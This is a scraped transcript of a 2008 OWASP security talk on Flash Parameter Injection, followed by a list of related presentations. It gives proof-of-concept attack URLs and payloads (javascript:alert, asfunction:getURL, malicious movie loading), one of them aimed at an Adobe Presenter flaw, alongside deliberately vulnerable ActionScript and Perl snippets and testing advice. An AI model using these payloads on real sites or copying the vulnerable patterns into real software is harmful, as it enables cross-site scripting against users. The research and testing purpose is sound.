Presentation is loading. Please wait.

Presentation is loading. Please wait.

OWASP 1 Flash Parameter Injection The OWASP Foundation OWASP 25/09/2008 Ayal Yogev Adi Sharabani IBM Rational Application Security.

Published byTrenton Towns Modified over 9 years ago

Similar presentations

Presentation on theme: "OWASP 1 Flash Parameter Injection The OWASP Foundation OWASP 25/09/2008 Ayal Yogev Adi Sharabani IBM Rational Application Security."— Presentation transcript:

1 OWASP 1 Flash Parameter Injection The OWASP Foundation OWASP http://www.owasp.org 25/09/2008 Ayal Yogev Adi Sharabani IBM Rational Application Security {ayal, adish}

2 OWASP 2 Agenda  Flash 101  Flash Security  The Problem  Flash Parameter Injection  Real Example  Testing

3 OWASP 3 F lash 101

4 OWASP 4 Background  Introduced in 1996  Adds animation and interactivity to Web pages  Contains a scripting language: Action Script  Very popular –Installed in over 99% of PCs  Advanced technologies: –Flex –Adobe AIR http://www.adobe.com/products/player_census/flashplayer/

5 OWASP 5 My Flash Movie My Flash Movie Accessing Flash movies  Can be embedded in HTML pages Host (Browser) Flash Player Flash Movie (SWF)

6 OWASP 6 Accessing Flash movies  Can be embedded in HTML pages  Can be accessed directly –http://host/movie.swf –A “dummy” HTML page may be created (browser dependant) –DOM access according to policy –Example (Firefox): <embed width="100%" height="100%“ name="plugin" src="http://host/movie.swf" type="application/x-shockwave-flash"/> <embed width="100%" height="100%“ name="plugin" src="http://host/movie.swf" type="application/x-shockwave-flash"/>

7 OWASP 7 Global Flash Variables  Action Script supports Global Variables  Global Variables can be assigned from outside the movie  Common use: if (_root.myparam == undefined) { _root.myparam = “my default value”; } if (_root.myparam == undefined) { _root.myparam = “my default value”; }

8 OWASP 8 <object type="application/x-shockwave-flash" data=" " width="600" height="345"> <object type="application/x-shockwave-flash" data=" " width="600" height="345"> Global Flash Variables  Action Script supports Global Variables  Global Variables can be assigned from outside the movie  Assigning Global Variables as parameters –Direct Reference –Embedded URI –Flash Attributes http://host/movie.swf?a=5&b=hello movie.swf?a=5&b=hello

9 OWASP 9 width="600" height="345"> <object type="application/x-shockwave-flash" data="movie.swf? " Global Flash Variables  Action Script supports Global Variables  Global Variables can be assigned from outside the movie  Assigning Global Variables as parameters –Direct Reference –Embedded URI –Flash Attributes <object type="application/x-shockwave-flash" data="movie.swf" flashvars=" " a=5&b=hello

10 OWASP 10 lash S ecurity

11 OWASP 11 Previous Research  Bypassing JavaScript Filters – the Flash! Attack Eye on Security, August 2002  Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy Breach Scan Security Wire, April 2003  Testing Flash Applications Stefano Di Paola, May 2007  Finding Vulnerabilities in Flash Applications Stefano Di Paola, November 2007

12 OWASP 12 Controlling Global Flash Variables can result in...  Cross-Site Flashing  Cross-Site Scripting through Flash  Phishing  Flow Manipulation  …

13 OWASP 13 Cross-Site Flashing  A vulnerable movie is tricked into loading a malicious movie  The malicious movie gets access to the same sandbox  Can be achieved using methods like loadMovie*:  Attack Vector Flash Player Flash Movie Flash Player Malicious Flash if (_root.movieURI == undefined) { _root.movieURI = "http://host/movie.swf"; } loadMovieNum(_root.movieURI, 1); if (_root.movieURI == undefined) { _root.movieURI = "http://host/movie.swf"; } loadMovieNum(_root.movieURI, 1); http://host/movie.swf?movieURI=maliciousFile.swf

14 OWASP 14 Cross-Site Scripting through Flash  Classic XSS using a vulnerable Flash file  Can be triggered by the use of global flash variables in: –getURL using payload javascript:alert('XSS') –Load* functions using payload asfunction:getURL,javascript:alert('XSS') –TextField.htmlText using payload –...

15 OWASP 15 Cross-Site Scripting through Flash (Example)  Consider movie.swf containing the code: if (_root.url == undefined) { _root.url = "http://host/"; } getURL(_root.url); if (_root.url == undefined) { _root.url = "http://host/"; } getURL(_root.url);

16 OWASP 16 Normal Usage

17 OWASP 17 Normal Usage

18 OWASP 18 Normal Usage

19 OWASP 19 Cross-Site Scripting through Flash (Example) http://host/movie.swf?url=javascript:alert(‘gotcha!’) Attack Vector: if (_root.url == undefined) { _root.url = "http://host/"; } getURL(_root.url); if (_root.url == undefined) { _root.url = "http://host/"; } getURL(_root.url);

20 OWASP 20 Cross-Site Scripting through Flash (Example)

21 OWASP 21 Cross-Site Scripting through Flash (Example)

22 OWASP 22 Cross-Site Scripting through Flash (Example)

23 OWASP 23 T he P roblem

24 OWASP 24 The Missing Link  Flash cannot always load without the original HTML  Flash movies may rely on parts of the DOM to execute –Use JavaScript variables and methods –Use HTML Dom elements  Direct access to flash may be restricted due to security Host (Browser) Flash Player Flash Movie (SWF) Host (Browser) Flash Player Flash Movie (SWF)

25 OWASP 25 The Missing Link - Example

26 OWASP 26 The Missing Link - Example

27 OWASP 27 The Missing Link - Example

28 OWASP 28 The Missing Link - Example

29 OWASP 29 The Missing Link - Example

30 OWASP 30

31 OWASP 31 Known examples of Flash attacks involve accessing the movie directly

32 OWASP 32 BUT… Some Flash movies cannot load when accessed directly

33 OWASP 33 FPI Injecting global variables into Flash in its original HTML environment

34 OWASP 34 FPI T echniques

35 OWASP 35 http://host/index.cgi?movie=movie.swf?globalVar=e-v-i-l Reflected FPI  Possible when the location of the Flash movie is retrieved through a URL parameter:  Attack example: # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="'. $params{movie}. '"> '; # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="'. $params{movie}. '"> '; <object type="application/x-shockwave-flash" data=" "> '; <object type="application/x-shockwave-flash" data=" "> '; movie.swf?globalVar=e-v-i-l

36 OWASP 36  Attack possible when global flash variables are received from HTML parameters without sanitization:  Attack occurs when victim is lured to click on a link line: # Read the 'language' parameter my $language = $params{language}; # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language='. $language.replace(’"’,’’). '"> '; # Read the 'language' parameter my $language = $params{language}; # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language='. $language.replace(’"’,’’). '"> '; Reflected FPI (Piggybacking FlashVars) http://host/index.cgi?language=English%26globalVar=e-v-i-l English%26globalVar=e-v-i-l … <object type="application/x-shockwave-flash" data="movie.swf" flashvars="language= "> … %26 is decoded to & English&globalVar=e-v-i-l

37 OWASP 37 # Embed the flash movie print " "; # Embed the flash movie print " "; <object type='application/x-shockwave-flash' data='movie.swf' width=' '> <object type='application/x-shockwave-flash' data='movie.swf' width=' '> FlashVars Injection  Possible when an attribute of object tag is received as a parameter:  Attack vector: http://host/index.cgi?width=600%27%20flashvars=%27globalVar=e-v-i-l 600%27%20flashvars=%27globalVar=e-v-i-l 600' flashvars='globalVar=e-v-i-l Decode values

38 OWASP 38 DOM Based FPI  document.location is used as a global Flash variable: var s = ''; var loc = encodeURI(document.location); s += ' '; document.write(s); var s = ''; var loc = encodeURI(document.location); s += ' '; document.write(s);

39 OWASP 39 DOM Based FPI (continued)  Attack vector:  The global variable is injected into the Flash movie embedded inside the DOM: <embed src="movie.swf" flashvars="location= "> http://host/index.htm#&globalVar=e-v-i-l

40 OWASP 40 DOM Based FPI (continued)  JavaScript function encodeURI is not sufficient in this case –Can prevent DOM based XSS but not DOM Based FPI –Does not encode all characters (e.g. ‘&’,’?’) –encodeURIComponent, escape or similar methods must be used –Appropriate encoding must be used (depending on context)  Attack is invisible to IDS and IPS –Data following ‘#’ is not sent to the server (‘?’ also works, but data following it is sent to the server)

41 OWASP 41 Persistent FPI  Shared local Flash objects (a.k.a. Flash cookies) –Used to store persistent data across multiple sessions and save Flash state  Storing shared local Flash objects: // Create a shared object mySharedObject = SharedObject.getLocal("sharedObjName"); // Store data in the shared object mySharedObject.data.name = "jsmith"; mySharedObject.data.homepage = "http://demo.testfire.net"; // Flush mySharedObject.flush(); // Create a shared object mySharedObject = SharedObject.getLocal("sharedObjName"); // Store data in the shared object mySharedObject.data.name = "jsmith"; mySharedObject.data.homepage = "http://demo.testfire.net"; // Flush mySharedObject.flush();

42 OWASP 42 Persistent FPI (continued)  Loading shared local Flash objects: // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal("sharedObjName"); // Check whether variable name exists if (mySharedObject.data.name == null) { // Shared object doesn't exist } else { // Read the name name = mySharedObject.data.name; // Read the homepage homepage = mySharedObject.data.homepage; } // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal("sharedObjName"); // Check whether variable name exists if (mySharedObject.data.name == null) { // Shared object doesn't exist } else { // Read the name name = mySharedObject.data.name; // Read the homepage homepage = mySharedObject.data.homepage; }

43 OWASP 43 Persistent FPI (continued)  Shared local Flash object is controlled by user input  Object is used inside the getURL method // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal(“urlToLoad"); // Check whether there is a shared object saved if(mySharedObject.data.url == null) { // Store the URL in a shared object mySharedObject.data.url = _root.inputURL; } // Get the URL getURL(mySharedObject.data.url); // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal(“urlToLoad"); // Check whether there is a shared object saved if(mySharedObject.data.url == null) { // Store the URL in a shared object mySharedObject.data.url = _root.inputURL; } // Get the URL getURL(mySharedObject.data.url); Host (Browser) Flash Player Flash Movie Flash Player Flash Movie

44 OWASP 44 Persistent FPI (continued)  After the first infection, XSS will be executed every time the movie is loaded  Attack can persist after vulnerability is fixed  IDS or IPS will only be able to detect initial infection

45 OWASP 45 Example CVE-2008-3515, CVE-2008-3516

46 OWASP 46 Adobe Presenter FPI Vulnerability  Illustration of the automatically created HTML: function showFlash(swf, w, h, loop) { var myLocation = document.location; //... s += '<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); } function showFlash(swf, w, h, loop) { var myLocation = document.location; //... s += '<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); } function showFlash(swf, w, h, loop) { var myLocation = encodeURI(document.location); //... s += '<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); } function showFlash(swf, w, h, loop) { var myLocation = encodeURI(document.location); //... s += '<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); }

47 OWASP 47 Adobe Presenter FPI Vulnerability (continued)  Movie Viewer.swf vulnerable to XSS through Flash: –Global parameter _url with payload “javascript:alert(‘XSS’)” –Global parameter baseurl with payload “asfunction:getURL,javascript:alert(‘XSS’)” –Works in Flash Player version 9,0,47,0 on both IE and Firefox  DOM based FPI allows the Flash to load within original HTML –Invisible to IPS/IDS  Vendors must recompile their Flash files to fix the problem http://host/index.htm#&_url=javascript:alert(document.domain)

48 OWASP 48 Testing

49 OWASP 49 Testing  Identify controlled Flash parameters: –Query parameters (from HTML) –FlashVars (from HTML) –Uninstantiated variables (from Action Script)  Locate potentially dangerous code: –Where controlled Flash parameters are used inside methods like: getURL, loadMovie, etc. –Save sequences leading to potentially dangerous code –Associate with parameter

50 OWASP 50 Testing (continued)  Mutation - Inject values into the parameters –XSS: javascript:window.open(‘http://my.site’) –XSF: http://my.site/movie.swf –Phishing: http://my.site  Validation –Play relevant sequences belonging to mutated parameter –Verify test results –Browser events –Action Script level Test Flash movie within its original HTML environment

51 OWASP 51 More details  IBM Rational Application Security Insider Blog: (Containing presentation and whitepaper) –http://blog.watchfire.comhttp://blog.watchfire.com  Flash movie demonstrating XSF and XSS through Flash –http://demo.testfire.net/vulnerable.swfhttp://demo.testfire.net/vulnerable.swf  Contact: –Ayal Yogev (Senior Security Researcher): ayal –Adi Sharabani (Security Research Group Manager): adish

52 OWASP 52 Questions? Flash

Download ppt "OWASP 1 Flash Parameter Injection The OWASP Foundation OWASP 25/09/2008 Ayal Yogev Adi Sharabani IBM Rational Application Security."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.

© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.
Attacking and defending Flash Applications. Flash Security I’ll talk about; o RIA, Web 2.0 and Security o What is Crossdomain.xml? Why does it exist?

Attacking and defending Flash Applications. Flash Security I’ll talk about; o RIA, Web 2.0 and Security o What is Crossdomain.xml? Why does it exist?
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Cross Site Scripting & SQL injection

Cross Site Scripting & SQL injection
HTML 5 and CSS 3, Illustrated Complete Unit K: Incorporating Video and Audio.

HTML 5 and CSS 3, Illustrated Complete Unit K: Incorporating Video and Audio.
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
Video, audio, embed, iframe, HTML Form

Video, audio, embed, iframe, HTML Form
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Team Members: Brad Stancel,

Team Members: Brad Stancel,
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
March Intensive: XSS Exploits

March Intensive: XSS Exploits
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report

Similar presentations

Ads by Google